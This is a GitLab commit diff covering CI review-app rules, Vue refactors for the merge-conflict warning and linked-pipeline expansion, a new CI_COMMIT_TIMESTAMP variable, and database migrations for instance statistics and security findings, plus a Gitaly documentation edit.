Add latest changes from gitlab-org/gitlab@master

GitLab Bot 2020-09-01 18:10:48 +00:00
parent adfb0e182c
commit 304e230182
83 changed files with 1254 additions and 503 deletions

View File

@ -45,7 +45,7 @@ review-build-cng:
DOMAIN: "-${CI_ENVIRONMENT_SLUG}.${REVIEW_APPS_DOMAIN}"
GITLAB_HELM_CHART_REF: "v4.3.0"
environment:
name: review/${CI_COMMIT_REF_NAME}
name: review/${CI_COMMIT_REF_SLUG}${FREQUENCY}
url: https://gitlab-${CI_ENVIRONMENT_SLUG}.${REVIEW_APPS_DOMAIN}
on_stop: review-stop
auto_stop_in: 48 hours
@ -113,8 +113,8 @@ review-stop-failed-deployment:
review-stop:
extends:
- .review-stop-base
- .review:rules:mr-only-manual
stage: review
- .review:rules:review-stop
stage: post-qa
script:
- delete_release

View File

@ -753,6 +753,17 @@
- <<: *if-dot-com-gitlab-org-schedule
allow_failure: true
.review:rules:review-stop:
rules:
- <<: *if-not-ee
when: never
- <<: *if-dot-com-gitlab-org-merge-request
changes: *code-qa-patterns
when: manual
allow_failure: true
- <<: *if-master-refs
allow_failure: true
.review:rules:danger:
rules:
- if: '$DANGER_GITLAB_API_TOKEN && $CI_MERGE_REQUEST_IID'

View File

@ -1 +1 @@
851da3925944b969da7f87057ba8da8274d5c18d
15c2f3921c4729e9c4d7ce8592300decfcfdb2e6

View File

@ -1,6 +1,6 @@
<script>
import { mapState, mapGetters, mapActions } from 'vuex';
import { GlLoadingIcon, GlButton, GlAlert, GlPagination, GlSprintf } from '@gitlab/ui';
import { GlLoadingIcon, GlPagination, GlSprintf } from '@gitlab/ui';
import Mousetrap from 'mousetrap';
import { __ } from '~/locale';
import { getParameterByName, parseBoolean } from '~/lib/utils/common_utils';
@ -13,9 +13,12 @@ import eventHub from '../../notes/event_hub';
import CompareVersions from './compare_versions.vue';
import DiffFile from './diff_file.vue';
import NoChanges from './no_changes.vue';
import HiddenFilesWarning from './hidden_files_warning.vue';
import CommitWidget from './commit_widget.vue';
import TreeList from './tree_list.vue';
import HiddenFilesWarning from './hidden_files_warning.vue';
import MergeConflictWarning from './merge_conflict_warning.vue';
import {
TREE_LIST_WIDTH_STORAGE_KEY,
INITIAL_TREE_WIDTH,
@ -33,13 +36,12 @@ export default {
DiffFile,
NoChanges,
HiddenFilesWarning,
MergeConflictWarning,
CommitWidget,
TreeList,
GlLoadingIcon,
PanelResizer,
GlPagination,
GlButton,
GlAlert,
GlSprintf,
},
mixins: [glFeatureFlagsMixin()],
@ -422,49 +424,12 @@ export default {
:plain-diff-path="plainDiffPath"
:email-patch-path="emailPatchPath"
/>
<div
<merge-conflict-warning
v-if="isDiffHead && hasConflicts"
:class="{
[CENTERED_LIMITED_CONTAINER_CLASSES]: isLimitedContainer,
}"
>
<gl-alert
:dismissible="false"
:title="__('There are merge conflicts')"
variant="warning"
class="w-100 mb-3"
>
<p class="mb-1">
{{ __('The comparison view may be inaccurate due to merge conflicts.') }}
</p>
<p class="mb-0">
{{
__(
'Resolve these conflicts or ask someone with write access to this repository to merge it locally.',
)
}}
</p>
<template #actions>
<gl-button
v-if="conflictResolutionPath"
:href="conflictResolutionPath"
variant="info"
class="mr-3 gl-alert-action"
>
{{ __('Resolve conflicts') }}
</gl-button>
<gl-button
v-if="canMerge"
class="gl-alert-action"
data-toggle="modal"
data-target="#modal_merge_info"
>
{{ __('Merge locally') }}
</gl-button>
</template>
</gl-alert>
</div>
:limited="isLimitedContainer"
:resolution-path="conflictResolutionPath"
:mergeable="canMerge"
/>
<div
:data-can-create-note="getNoteableData.current_user.can_create_note"

View File

@ -94,11 +94,7 @@ export default {
},
'file.file_hash': {
handler: function watchFileHash() {
if (
this.glFeatures.autoExpandCollapsedDiffs &&
this.viewDiffsFileByFile &&
this.file.viewer.collapsed
) {
if (this.viewDiffsFileByFile && this.file.viewer.collapsed) {
this.isCollapsed = false;
this.handleLoadCollapsedDiff();
} else {
@ -108,7 +104,7 @@ export default {
immediate: true,
},
'file.viewer.collapsed': function setIsCollapsed(newVal) {
if (!this.viewDiffsFileByFile && !this.glFeatures.autoExpandCollapsedDiffs) {
if (!this.viewDiffsFileByFile) {
this.isCollapsed = newVal;
}
},

View File

@ -0,0 +1,72 @@
<script>
import { GlButton, GlAlert } from '@gitlab/ui';
import { CENTERED_LIMITED_CONTAINER_CLASSES } from '../constants';
export default {
components: {
GlAlert,
GlButton,
},
props: {
limited: {
type: Boolean,
required: true,
},
mergeable: {
type: Boolean,
required: true,
},
resolutionPath: {
type: String,
required: true,
},
},
computed: {
containerClasses() {
return {
[CENTERED_LIMITED_CONTAINER_CLASSES]: this.limited,
};
},
},
};
</script>
<template>
<div :class="containerClasses">
<gl-alert
:dismissible="false"
:title="__('There are merge conflicts')"
variant="warning"
class="gl-mb-5"
>
<p class="gl-mb-2">
{{ __('The comparison view may be inaccurate due to merge conflicts.') }}
</p>
<p class="gl-mb-0">
{{
__(
'Resolve these conflicts or ask someone with write access to this repository to merge it locally.',
)
}}
</p>
<template #actions>
<gl-button
v-if="resolutionPath"
:href="resolutionPath"
variant="info"
class="gl-mr-5 gl-alert-action"
>
{{ __('Resolve conflicts') }}
</gl-button>
<gl-button
v-if="mergeable"
class="gl-alert-action"
data-toggle="modal"
data-target="#modal_merge_info"
>
{{ __('Merge locally') }}
</gl-button>
</template>
</gl-alert>
</div>
</template>

View File

@ -44,6 +44,10 @@ export default {
return {
downstreamMarginTop: null,
jobName: null,
pipelineExpanded: {
jobName: '',
expanded: false,
},
};
},
computed: {
@ -120,6 +124,19 @@ export default {
setJob(jobName) {
this.jobName = jobName;
},
setPipelineExpanded(jobName, expanded) {
if (expanded) {
this.pipelineExpanded = {
jobName,
expanded,
};
} else {
this.pipelineExpanded = {
expanded,
jobName: '',
};
}
},
},
};
</script>
@ -181,6 +198,7 @@ export default {
:has-triggered-by="hasTriggeredBy"
:action="stage.status.action"
:job-hovered="jobName"
:pipeline-expanded="pipelineExpanded"
@refreshPipelineGraph="refreshPipelineGraph"
/>
</ul>
@ -193,6 +211,7 @@ export default {
graph-position="right"
@linkedPipelineClick="handleClickedDownstream"
@downstreamHovered="setJob"
@pipelineExpandToggle="setPipelineExpanded"
/>
<pipeline-graph

View File

@ -31,7 +31,7 @@ import delayedJobMixin from '~/jobs/mixins/delayed_job_mixin';
*/
export default {
hoverClass: 'gl-inset-border-1-blue-500',
hoverClass: 'gl-shadow-x0-y0-b3-s1-blue-500',
components: {
ActionComponent,
JobNameComponent,
@ -61,6 +61,11 @@ export default {
required: false,
default: '',
},
pipelineExpanded: {
type: Object,
required: false,
default: () => ({}),
},
},
computed: {
boundary() {
@ -101,8 +106,14 @@ export default {
hasAction() {
return this.job.status && this.job.status.action && this.job.status.action.path;
},
relatedDownstreamHovered() {
return this.job.name === this.jobHovered;
},
relatedDownstreamExpanded() {
return this.job.name === this.pipelineExpanded.jobName && this.pipelineExpanded.expanded;
},
jobClasses() {
return this.job.name === this.jobHovered
return this.relatedDownstreamHovered || this.relatedDownstreamExpanded
? `${this.$options.hoverClass} ${this.cssClassJobName}`
: this.cssClassJobName;
},

View File

@ -1,5 +1,5 @@
<script>
import { GlTooltipDirective, GlButton } from '@gitlab/ui';
import { GlTooltipDirective, GlButton, GlLink, GlLoadingIcon } from '@gitlab/ui';
import CiStatus from '~/vue_shared/components/ci_icon.vue';
import { __, sprintf } from '~/locale';
@ -10,6 +10,8 @@ export default {
components: {
CiStatus,
GlButton,
GlLink,
GlLoadingIcon,
},
props: {
pipeline: {
@ -25,6 +27,11 @@ export default {
required: true,
},
},
data() {
return {
expanded: false,
};
},
computed: {
tooltipText() {
return `${this.downstreamTitle} #${this.pipeline.id} - ${this.pipelineStatus.label}
@ -66,11 +73,22 @@ export default {
? sprintf(__('Created by %{job}'), { job: this.pipeline.source_job.name })
: '';
},
expandedIcon() {
if (this.parentPipeline) {
return this.expanded ? 'angle-right' : 'angle-left';
}
return this.expanded ? 'angle-left' : 'angle-right';
},
expandButtonPosition() {
return this.parentPipeline ? 'gl-left-0 gl-border-r-1!' : 'gl-right-0 gl-border-l-1!';
},
},
methods: {
onClickLinkedPipeline() {
this.$root.$emit('bv::hide::tooltip', this.buttonId);
this.expanded = !this.expanded;
this.$emit('pipelineClicked', this.$refs.linkedPipeline);
this.$emit('pipelineExpandToggle', this.pipeline.source_job.name, this.expanded);
},
hideTooltips() {
this.$root.$emit('bv::hide::tooltip');
@ -88,27 +106,53 @@ export default {
<template>
<li
ref="linkedPipeline"
v-gl-tooltip
class="linked-pipeline build"
:title="tooltipText"
:class="{ 'downstream-pipeline': isDownstream }"
data-qa-selector="child_pipeline"
@mouseover="onDownstreamHovered"
@mouseleave="onDownstreamHoverLeave"
>
<gl-button
:id="buttonId"
v-gl-tooltip
:title="tooltipText"
class="linked-pipeline-content"
data-qa-selector="linked_pipeline_button"
:class="`js-pipeline-expand-${pipeline.id}`"
:loading="pipeline.isLoading"
@click="onClickLinkedPipeline"
<div
class="gl-relative gl-bg-white gl-p-3 gl-border-solid gl-border-gray-100 gl-border-1"
:class="{ 'gl-pl-9': parentPipeline }"
>
<ci-status v-if="!pipeline.isLoading" :status="pipelineStatus" css-classes="gl-top-0" />
<span class="str-truncated"> {{ downstreamTitle }} &#8226; #{{ pipeline.id }} </span>
<div class="gl-display-flex">
<ci-status
v-if="!pipeline.isLoading"
:status="pipelineStatus"
css-classes="gl-top-0 gl-pr-2"
/>
<div v-else class="gl-pr-2"><gl-loading-icon inline /></div>
<div class="gl-display-flex gl-flex-direction-column gl-w-13">
<span class="gl-text-truncate">
{{ downstreamTitle }}
</span>
<div class="gl-text-truncate">
<gl-link
v-if="childPipeline"
class="gl-text-blue-500!"
:href="pipeline.path"
data-testid="childPipelineLink"
>#{{ pipeline.id }}</gl-link
>
<span v-else>#{{ pipeline.id }}</span>
</div>
</div>
</div>
<div class="gl-pt-2">
<span class="badge badge-primary" data-testid="downstream-pipeline-label">{{ label }}</span>
</div>
</gl-button>
<gl-button
:id="buttonId"
class="gl-absolute gl-top-0 gl-bottom-0 gl-shadow-none! gl-rounded-0!"
:class="`js-pipeline-expand-${pipeline.id} ${expandButtonPosition}`"
:icon="expandedIcon"
data-testid="expandPipelineButton"
data-qa-selector="linked_pipeline_button"
@click="onClickLinkedPipeline"
/>
</div>
</li>
</template>

View File

@ -44,6 +44,9 @@ export default {
onDownstreamHovered(jobName) {
this.$emit('downstreamHovered', jobName);
},
onPipelineExpandToggle(jobName, expanded) {
this.$emit('pipelineExpandToggle', jobName, expanded);
},
},
};
</script>
@ -65,6 +68,7 @@ export default {
:project-id="projectId"
@pipelineClicked="onPipelineClick($event, pipeline, index)"
@downstreamHovered="onDownstreamHovered"
@pipelineExpandToggle="onPipelineExpandToggle"
/>
</ul>
</div>

View File

@ -41,6 +41,11 @@ export default {
required: false,
default: '',
},
pipelineExpanded: {
type: Object,
required: false,
default: () => ({}),
},
},
computed: {
hasAction() {
@ -86,6 +91,7 @@ export default {
v-if="group.size === 1"
:job="group.jobs[0]"
:job-hovered="jobHovered"
:pipeline-expanded="pipelineExpanded"
css-class-job-name="build-content"
@pipelineActionRequestComplete="pipelineActionRequestComplete"
/>

View File

@ -108,7 +108,9 @@ export default {
</div>
</template>
<div class="row">
<div class="col-md-5 order-md-last col-12 gl-mt-5 mt-md-n1 pt-md-1 svg-content svg-225">
<div
class="col-md-5 order-md-last col-12 gl-mt-5 gl-mt-md-n2! gl-pt-md-2 svg-content svg-225"
>
<img data-testid="pipeline-image" :src="pipelineSvgPath" />
</div>
<div class="col-md-7 order-md-first col-12">

View File

@ -119,3 +119,7 @@
width: auto !important;
}
}
.gl-shadow-x0-y0-b3-s1-blue-500 {
box-shadow: inset 0 0 3px $gl-border-size-1 $blue-500;
}

View File

@ -34,7 +34,6 @@ class Projects::MergeRequestsController < Projects::MergeRequests::ApplicationCo
push_frontend_feature_flag(:multiline_comments, @project, default_enabled: true)
push_frontend_feature_flag(:file_identifier_hash)
push_frontend_feature_flag(:batch_suggestions, @project, default_enabled: true)
push_frontend_feature_flag(:auto_expand_collapsed_diffs, @project, default_enabled: true)
push_frontend_feature_flag(:approvals_commented_by, @project, default_enabled: true)
push_frontend_feature_flag(:hide_jump_to_next_unresolved_in_threads, default_enabled: true)
push_frontend_feature_flag(:merge_request_widget_graphql, @project)

View File

@ -0,0 +1,9 @@
# frozen_string_literal: true
module Analytics
module InstanceStatistics
def self.table_name_prefix
'analytics_instance_statistics_'
end
end
end

View File

@ -0,0 +1,12 @@
# frozen_string_literal: true
module Analytics
module InstanceStatistics
class Measurement < ApplicationRecord
enum identifier: { projects: 1, users: 2 }
validates :recorded_at, :identifier, :count, presence: true
validates :recorded_at, uniqueness: { scope: :identifier }
end
end
end

View File

@ -647,6 +647,10 @@ module Ci
!artifacts_expired? && artifacts_file&.exists?
end
def locked_artifacts?
pipeline.artifacts_locked? && artifacts_file&.exists?
end
# This method is similar to #artifacts? but it includes the artifacts
# locking mechanics. A new method was created to prevent breaking existing
# behavior and avoid introducing N+1s.

View File

@ -491,6 +491,12 @@ module Ci
end
end
def git_commit_timestamp
strong_memoize(:git_commit_timestamp) do
commit.try(:timestamp)
end
end
def before_sha
super || Gitlab::Git::BLANK_SHA
end
@ -768,6 +774,7 @@ module Ci
variables.append(key: 'CI_COMMIT_TITLE', value: git_commit_full_title.to_s)
variables.append(key: 'CI_COMMIT_DESCRIPTION', value: git_commit_description.to_s)
variables.append(key: 'CI_COMMIT_REF_PROTECTED', value: (!!protected_ref?).to_s)
variables.append(key: 'CI_COMMIT_TIMESTAMP', value: git_commit_timestamp.to_s)
# legacy variables
variables.append(key: 'CI_BUILD_REF', value: sha)
@ -860,6 +867,10 @@ module Ci
builds.latest.with_reports(reports_scope)
end
def builds_with_coverage
builds.with_coverage
end
def has_reports?(reports_scope)
complete? && latest_report_builds(reports_scope).exists?
end

View File

@ -221,12 +221,16 @@ class Commit
description.present?
end
def timestamp
committed_date.xmlschema
end
def hook_attrs(with_changed_files: false)
data = {
id: id,
message: safe_message,
title: title,
timestamp: committed_date.xmlschema,
timestamp: timestamp,
url: Gitlab::UrlBuilder.build(self),
author: {
name: author_name,

View File

@ -295,7 +295,7 @@ class MergeRequest < ApplicationRecord
alias_attribute :auto_merge_enabled, :merge_when_pipeline_succeeds
alias_method :issuing_parent, :target_project
delegate :active?, to: :head_pipeline, prefix: true, allow_nil: true
delegate :active?, :builds_with_coverage, to: :head_pipeline, prefix: true, allow_nil: true
delegate :success?, :active?, to: :actual_head_pipeline, prefix: true, allow_nil: true
RebaseLockTimeout = Class.new(StandardError)

View File

@ -0,0 +1,5 @@
# frozen_string_literal: true
class BuildCoverageEntity < Grape::Entity
expose :name, :coverage
end

View File

@ -27,15 +27,15 @@ class BuildDetailsEntity < JobEntity
end
expose :artifact, if: -> (*) { can?(current_user, :read_build, build) } do
expose :download_path, if: -> (*) { build.pipeline.artifacts_locked? || build.artifacts? } do |build|
expose :download_path, if: -> (*) { build.locked_artifacts? || build.artifacts? } do |build|
download_project_job_artifacts_path(project, build)
end
expose :browse_path, if: -> (*) { build.pipeline.artifacts_locked? || build.browsable_artifacts? } do |build|
expose :browse_path, if: -> (*) { build.locked_artifacts? || build.browsable_artifacts? } do |build|
browse_project_job_artifacts_path(project, build)
end
expose :keep_path, if: -> (*) { build.has_expiring_archive_artifacts? && can?(current_user, :update_build, build) } do |build|
expose :keep_path, if: -> (*) { (build.locked_artifacts? || build.has_expiring_archive_artifacts?) && can?(current_user, :update_build, build) } do |build|
keep_project_job_artifacts_path(project, build)
end

View File

@ -73,6 +73,8 @@ class MergeRequestPollWidgetEntity < Grape::Entity
presenter(merge_request).pipeline_coverage_delta
end
expose :head_pipeline_builds_with_coverage, as: :builds_with_coverage, using: BuildCoverageEntity
expose :cancel_auto_merge_path do |merge_request|
presenter(merge_request).cancel_auto_merge_path
end

View File

@ -2,14 +2,7 @@
.gl-alert.gl-alert-danger.outdated-browser{ :role => "alert" }
= sprite_icon('error', css_class: "gl-alert-icon gl-alert-icon-no-title gl-icon")
.gl-alert-body
- if browser.ie? && browser.version.to_i == 11
- feedback_link_url = 'https://gitlab.com/gitlab-org/gitlab/issues/197987'
- feedback_link_start = '<a href="%{url}" class="gl-link" target="_blank" rel="noopener noreferrer">'.html_safe % { url: feedback_link_url }
= s_('OutdatedBrowser|From May 2020 GitLab no longer supports Internet Explorer 11.')
%br
= s_('OutdatedBrowser|You can provide feedback %{feedback_link_start}on this issue%{feedback_link_end} or via your usual support channels.').html_safe % { feedback_link_start: feedback_link_start, feedback_link_end: '</a>'.html_safe }
- else
= s_('OutdatedBrowser|GitLab may not work properly, because you are using an outdated web browser.')
= s_('OutdatedBrowser|GitLab may not work properly, because you are using an outdated web browser.')
%br
- browser_link_start = '<a href="%{url}" target="_blank" rel="noopener noreferrer">'.html_safe % { url: help_page_path('install/requirements', anchor: 'supported-web-browsers') }
= s_('OutdatedBrowser|Please install a %{browser_link_start}supported web browser%{browser_link_end} for a better experience.').html_safe % { browser_link_start: browser_link_start, browser_link_end: '</a>'.html_safe }

View File

@ -0,0 +1,5 @@
---
title: Create `security_findings` table
merge_request: 40368
author:
type: added

View File

@ -0,0 +1,5 @@
---
title: Create table for storing Instance Statistics object counts
merge_request: 40605
author:
type: added

View File

@ -0,0 +1,5 @@
---
title: Add CI_COMMIT_TIMESTAMP CI variable
merge_request: 40388
author: Nasko Vasilev
type: added

View File

@ -0,0 +1,5 @@
---
title: Fix issue causing 'Expand All' button to not work in MR diffs view (Remove `autoExpandCollapsedDiffs` feature flag)
merge_request: 40960
author:
type: fixed

View File

@ -0,0 +1,5 @@
---
title: Return builds with coverage in MR widget JSON response
merge_request: 40533
author:
type: added

View File

@ -0,0 +1,5 @@
---
title: Show keep button for locked artifacts.
merge_request: 40962
author:
type: changed

View File

@ -0,0 +1,5 @@
---
title: Improve ability to navigate to child pipelines
merge_request: 40650
author:
type: added

View File

@ -0,0 +1,5 @@
---
title: Fix visibility param for ProjectSnippet REST endpoint
merge_request: 40966
author:
type: fixed

View File

@ -0,0 +1,25 @@
# frozen_string_literal: true
require './spec/support/sidekiq_middleware'
Gitlab::Seeder.quiet do
model_class = Analytics::InstanceStatistics::Measurement
recorded_at = Date.today
# Insert random counts for the last 10 weeks
measurements = 10.times.flat_map do
recorded_at = (recorded_at - 1.week).end_of_week.end_of_day - 5.minutes
model_class.identifiers.map do |_, id|
{
recorded_at: recorded_at,
count: rand(1_000_000),
identifier: id
}
end
end
model_class.upsert_all(measurements, unique_by: [:identifier, :recorded_at])
print '.'
end

View File

@ -0,0 +1,27 @@
# frozen_string_literal: true
class CreateSecurityFindingsTable < ActiveRecord::Migration[6.0]
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
disable_ddl_transaction!
def up
unless table_exists?(:security_findings)
create_table :security_findings do |t|
t.references :scan, null: false
t.references :scanner, null: false
t.integer :severity, limit: 2, index: true, null: false
t.integer :confidence, limit: 2, index: true, null: false
t.text :project_fingerprint, index: true, null: false
end
end
add_text_limit :security_findings, :project_fingerprint, 40
end
def down
drop_table :security_findings
end
end

View File

@ -0,0 +1,16 @@
# frozen_string_literal: true
class CreateAnalyticsInstanceStatisticsMeasurements < ActiveRecord::Migration[6.0]
DOWNTIME = false
UNIQUE_INDEX_NAME = 'index_on_instance_statistics_recorded_at_and_identifier'
def change
create_table :analytics_instance_statistics_measurements do |t|
t.bigint :count, null: false
t.datetime_with_timezone :recorded_at, null: false
t.integer :identifier, limit: 2, null: false
end
add_index :analytics_instance_statistics_measurements, [:identifier, :recorded_at], unique: true, name: UNIQUE_INDEX_NAME
end
end

View File

@ -0,0 +1,19 @@
# frozen_string_literal: true
class AddForeignKeyOnScanIdToSecurityScans < ActiveRecord::Migration[6.0]
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
def up
with_lock_retries do
add_foreign_key :security_findings, :security_scans, column: :scan_id, on_delete: :cascade # rubocop:disable Migration/AddConcurrentForeignKey
end
end
def down
with_lock_retries do
remove_foreign_key :security_findings, column: :scan_id
end
end
end

View File

@ -0,0 +1,19 @@
# frozen_string_literal: true
class AddForeignKeyOnScannerIdToVulnerabilityScanners < ActiveRecord::Migration[6.0]
include Gitlab::Database::MigrationHelpers
DOWNTIME = false
def up
with_lock_retries do
add_foreign_key :security_findings, :vulnerability_scanners, column: :scanner_id, on_delete: :cascade # rubocop:disable Migration/AddConcurrentForeignKey
end
end
def down
with_lock_retries do
remove_foreign_key :security_findings, column: :scanner_id
end
end
end

View File

@ -0,0 +1 @@
d5e81848257b3391d99b198b177531a4c190ca6f19b27c9aedaa931f6eb3165a

View File

@ -0,0 +1 @@
f581bd5f5ec26dc33643c77fb8c7a64a9053b55c3f6a7281fea89ac4790a58d2

View File

@ -0,0 +1 @@
b3ee994231a8da694dbcda227b37e19a2112be666648d918425b064ec19d239e

View File

@ -0,0 +1 @@
b575558752206149171a05231e4167e1ac3e1295f76d800edfe3d61c1b996b52

View File

@ -8930,6 +8930,22 @@ CREATE SEQUENCE public.analytics_cycle_analytics_project_stages_id_seq
ALTER SEQUENCE public.analytics_cycle_analytics_project_stages_id_seq OWNED BY public.analytics_cycle_analytics_project_stages.id;
CREATE TABLE public.analytics_instance_statistics_measurements (
id bigint NOT NULL,
count bigint NOT NULL,
recorded_at timestamp with time zone NOT NULL,
identifier smallint NOT NULL
);
CREATE SEQUENCE public.analytics_instance_statistics_measurements_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.analytics_instance_statistics_measurements_id_seq OWNED BY public.analytics_instance_statistics_measurements.id;
CREATE TABLE public.analytics_language_trend_repository_languages (
file_count integer DEFAULT 0 NOT NULL,
programming_language_id bigint NOT NULL,
@ -15371,6 +15387,25 @@ CREATE SEQUENCE public.scim_oauth_access_tokens_id_seq
ALTER SEQUENCE public.scim_oauth_access_tokens_id_seq OWNED BY public.scim_oauth_access_tokens.id;
CREATE TABLE public.security_findings (
id bigint NOT NULL,
scan_id bigint NOT NULL,
scanner_id bigint NOT NULL,
severity smallint NOT NULL,
confidence smallint NOT NULL,
project_fingerprint text NOT NULL,
CONSTRAINT check_b9508c6df8 CHECK ((char_length(project_fingerprint) <= 40))
);
CREATE SEQUENCE public.security_findings_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
ALTER SEQUENCE public.security_findings_id_seq OWNED BY public.security_findings.id;
CREATE TABLE public.security_scans (
id bigint NOT NULL,
created_at timestamp with time zone NOT NULL,
@ -16814,6 +16849,8 @@ ALTER TABLE ONLY public.analytics_cycle_analytics_group_value_streams ALTER COLU
ALTER TABLE ONLY public.analytics_cycle_analytics_project_stages ALTER COLUMN id SET DEFAULT nextval('public.analytics_cycle_analytics_project_stages_id_seq'::regclass);
ALTER TABLE ONLY public.analytics_instance_statistics_measurements ALTER COLUMN id SET DEFAULT nextval('public.analytics_instance_statistics_measurements_id_seq'::regclass);
ALTER TABLE ONLY public.appearances ALTER COLUMN id SET DEFAULT nextval('public.appearances_id_seq'::regclass);
ALTER TABLE ONLY public.application_setting_terms ALTER COLUMN id SET DEFAULT nextval('public.application_setting_terms_id_seq'::regclass);
@ -17368,6 +17405,8 @@ ALTER TABLE ONLY public.scim_identities ALTER COLUMN id SET DEFAULT nextval('pub
ALTER TABLE ONLY public.scim_oauth_access_tokens ALTER COLUMN id SET DEFAULT nextval('public.scim_oauth_access_tokens_id_seq'::regclass);
ALTER TABLE ONLY public.security_findings ALTER COLUMN id SET DEFAULT nextval('public.security_findings_id_seq'::regclass);
ALTER TABLE ONLY public.security_scans ALTER COLUMN id SET DEFAULT nextval('public.security_scans_id_seq'::regclass);
ALTER TABLE ONLY public.self_managed_prometheus_alert_events ALTER COLUMN id SET DEFAULT nextval('public.self_managed_prometheus_alert_events_id_seq'::regclass);
@ -17712,6 +17751,9 @@ ALTER TABLE ONLY public.analytics_cycle_analytics_group_value_streams
ALTER TABLE ONLY public.analytics_cycle_analytics_project_stages
ADD CONSTRAINT analytics_cycle_analytics_project_stages_pkey PRIMARY KEY (id);
ALTER TABLE ONLY public.analytics_instance_statistics_measurements
ADD CONSTRAINT analytics_instance_statistics_measurements_pkey PRIMARY KEY (id);
ALTER TABLE ONLY public.appearances
ADD CONSTRAINT appearances_pkey PRIMARY KEY (id);
@ -18627,6 +18669,9 @@ ALTER TABLE ONLY public.scim_identities
ALTER TABLE ONLY public.scim_oauth_access_tokens
ADD CONSTRAINT scim_oauth_access_tokens_pkey PRIMARY KEY (id);
ALTER TABLE ONLY public.security_findings
ADD CONSTRAINT security_findings_pkey PRIMARY KEY (id);
ALTER TABLE ONLY public.security_scans
ADD CONSTRAINT security_scans_pkey PRIMARY KEY (id);
@ -20325,6 +20370,8 @@ CREATE INDEX index_on_id_partial_with_legacy_storage ON public.projects USING bt
CREATE INDEX index_on_identities_lower_extern_uid_and_provider ON public.identities USING btree (lower((extern_uid)::text), provider);
CREATE UNIQUE INDEX index_on_instance_statistics_recorded_at_and_identifier ON public.analytics_instance_statistics_measurements USING btree (identifier, recorded_at);
CREATE INDEX index_on_users_name_lower ON public.users USING btree (lower((name)::text));
CREATE INDEX index_open_project_tracker_data_on_service_id ON public.open_project_tracker_data USING btree (service_id);
@ -20797,6 +20844,16 @@ CREATE INDEX index_secure_ci_builds_on_user_id_created_at_parser_features ON pub
CREATE INDEX index_security_ci_builds_on_name_and_id_parser_features ON public.ci_builds USING btree (name, id) WHERE (((name)::text = ANY (ARRAY[('container_scanning'::character varying)::text, ('dast'::character varying)::text, ('dependency_scanning'::character varying)::text, ('license_management'::character varying)::text, ('sast'::character varying)::text, ('secret_detection'::character varying)::text, ('coverage_fuzzing'::character varying)::text, ('license_scanning'::character varying)::text])) AND ((type)::text = 'Ci::Build'::text));
CREATE INDEX index_security_findings_on_confidence ON public.security_findings USING btree (confidence);
CREATE INDEX index_security_findings_on_project_fingerprint ON public.security_findings USING btree (project_fingerprint);
CREATE INDEX index_security_findings_on_scan_id ON public.security_findings USING btree (scan_id);
CREATE INDEX index_security_findings_on_scanner_id ON public.security_findings USING btree (scanner_id);
CREATE INDEX index_security_findings_on_severity ON public.security_findings USING btree (severity);
CREATE INDEX index_self_managed_prometheus_alert_events_on_environment_id ON public.self_managed_prometheus_alert_events USING btree (environment_id);
CREATE INDEX index_sent_notifications_on_noteable_type_noteable_id ON public.sent_notifications USING btree (noteable_id) WHERE ((noteable_type)::text = 'Issue'::text);
@ -22674,6 +22731,9 @@ ALTER TABLE ONLY public.list_user_preferences
ALTER TABLE ONLY public.project_custom_attributes
ADD CONSTRAINT fk_rails_719c3dccc5 FOREIGN KEY (project_id) REFERENCES public.projects(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.security_findings
ADD CONSTRAINT fk_rails_729b763a54 FOREIGN KEY (scanner_id) REFERENCES public.vulnerability_scanners(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.dast_scanner_profiles
ADD CONSTRAINT fk_rails_72a8ba7141 FOREIGN KEY (project_id) REFERENCES public.projects(id) ON DELETE CASCADE;
@ -23007,6 +23067,9 @@ ALTER TABLE ONLY public.approval_project_rules_users
ALTER TABLE ONLY public.lists
ADD CONSTRAINT fk_rails_baed5f39b7 FOREIGN KEY (milestone_id) REFERENCES public.milestones(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.security_findings
ADD CONSTRAINT fk_rails_bb63863cf1 FOREIGN KEY (scan_id) REFERENCES public.security_scans(id) ON DELETE CASCADE;
ALTER TABLE ONLY public.approval_merge_request_rules_users
ADD CONSTRAINT fk_rails_bc8972fa55 FOREIGN KEY (user_id) REFERENCES public.users(id) ON DELETE CASCADE;

View File

@ -348,50 +348,51 @@ are supported and can be added if needed.
## Configure Gitaly
Deploying Gitaly in its own server can benefit GitLab installations that are
larger than a single machine. Gitaly node requirements are dependent on data,
specifically the number of projects and their sizes. It's recommended that each
Gitaly node store no more than 5TB of data. Your 2K setup may require one or more
nodes depending on your repository storage requirements.
[Gitaly](../gitaly/index.md) server node requirements are dependent on data,
specifically the number of projects and those projects' sizes. It's recommended
that a Gitaly server node stores no more than 5TB of data. Although this
reference architecture includes a single Gitaly server node, you may require
additional nodes depending on your repository storage requirements.
We strongly recommend that all Gitaly nodes should be set up with SSD disks with a throughput of at least
8,000 IOPS for read operations and 2,000 IOPS for write, as Gitaly has heavy I/O.
These IOPS values are recommended only as a starter as with time they may be
adjusted higher or lower depending on the scale of your environment's workload.
If you're running the environment on a Cloud provider
you may need to refer to their documentation on how configure IOPS correctly.
Due to Gitaly having notable input and output requirements, we strongly
recommend that all Gitaly nodes use solid-state drives (SSDs). These SSDs
should have a throughput of at least 8,000
input/output operations per second (IOPS) for read operations and 2,000 IOPS
for write operations. These IOPS values are initial recommendations, and may be
adjusted to greater or lesser values depending on the scale of your
environment's workload. If you're running the environment on a Cloud provider,
refer to their documentation about how to configure IOPS correctly.
Some things to note:
Be sure to note the following items:
- The GitLab Rails application shards repositories into [repository storages](../repository_storage_paths.md).
- A Gitaly server can host one or more storages.
- A GitLab server can use one or more Gitaly servers.
- Gitaly addresses must be specified in such a way that they resolve
correctly for ALL Gitaly clients.
- The GitLab Rails application shards repositories into
[repository storage paths](../repository_storage_paths.md).
- A Gitaly server can host one or more storage paths.
- A GitLab server can use one or more Gitaly server nodes.
- Gitaly addresses must be specified to be correctly resolvable for *all*
Gitaly clients.
- Gitaly servers must not be exposed to the public internet, as Gitaly's network
traffic is unencrypted by default. The use of a firewall is highly recommended
to restrict access to the Gitaly server. Another option is to
[use TLS](#gitaly-tls-support).
TIP: **Tip:**
For more information about Gitaly's history and network architecture see the
